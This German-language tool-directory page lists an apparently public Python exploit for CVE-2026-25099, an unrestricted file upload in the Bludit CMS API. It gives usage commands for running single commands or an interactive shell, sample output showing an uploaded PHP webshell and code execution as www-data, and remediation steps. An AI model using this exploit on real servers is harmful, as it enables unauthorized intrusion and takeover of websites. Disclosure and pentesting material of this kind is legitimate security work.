Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-25099 — Python-Exploit für den Bludit-CMS-API-unbeschränkten Datei-Upload, der zu Remote-Code-Ausführung führt und Befehlsausführung sowie eine interaktive Shell für autorisierte Tests bereitstellt. | Kitploit
Tools/GitHubGitHub/yahiahamza/cve-2026-25099
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung
GitHubyahiahamza/cve-2026-25099

CVE-2026-25099

Python-Exploit für den Bludit-CMS-API-unbeschränkten Datei-Upload, der zu Remote-Code-Ausführung führt und Befehlsausführung sowie eine interaktive Shell für autorisierte Tests bereitstellt.

Repository anzeigen
3vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-25099 - Bludit CMS API Unbeschränkter Datei-Upload zu RCE

Beschreibung

Bludit CMS-Versionen vor 3.18.4 erlauben einem authentifizierten Angreifer mit einem gültigen API-Token, Dateien beliebigen Typs und beliebiger Erweiterung über den Endpunkt POST /api/files/<page-key> hochzuladen. Die Funktion uploadFile() führt keine Prüfung der Dateierweiterung oder des Inhalts durch, wodurch PHP-Webshells hochgeladen und als www-data ausgeführt werden können.

Betroffene Versionen

  • Verwundbar: Bludit < 3.18.4
  • Behoben: Bludit 3.18.4
  • Voraussetzung: Gültiges API-Token (im Admin-Panel unter Plugins → API sichtbar)

Verwendung

root@kitploit:~
# Einzelne Befehlsausführung
python3 CVE-2026-25099.py -u http://target -t "API_TOKEN" -c "id"

# Interaktive Shell
python3 CVE-2026-25099.py -u http://target -t "API_TOKEN"

Beispielausgabe

root@kitploit:~
[*] CVE-2026-25099 - Bludit CMS API Datei-Upload zu RCE
[*] Ziel: http://target
[*] Seiten-Schlüssel wird abgerufen...
[+] Seiten-Schlüssel: create-your-own-content
[*] Webshell wird hochgeladen...
[+] Shell hochgeladen: http://target/bl-content/uploads/pages/create-your-own-content/abcdefgh.php
[*] RCE wird verifiziert...
[+] RCE bestätigt: uid=33(www-data) gid=33(www-data) groups=33(www-data)

[+] Interaktive Shell (tippe 'exit' zum Beenden)

shell> whoami
www-data
shell> grep BLUDIT_VERSION /var/www/html/bl-kernel/boot/init.php
define('BLUDIT_VERSION', '3.18.2');

Screenshots

PoC-Ausführung

Behebung

  • Update auf Bludit 3.18.4 oder neuer durchführen
  • Das API-Plugin deaktivieren, falls nicht benötigt
  • /bl-content/uploads/ auf unerwartete PHP-Dateien überwachen

Referenzen

  • CVE-2026-25099 auf MITRE
  • Technische Analyse - yh.do

Autor

Yahia Hamza - https://yh.do

Haftungsausschluss

Dieses Tool wird ausschließlich für autorisierte Sicherheitstests und Bildungszwecke bereitgestellt. Verwende es verantwortungsvoll und nur gegen Systeme, für die du die Erlaubnis zum Testen hast.

Tool herunterladen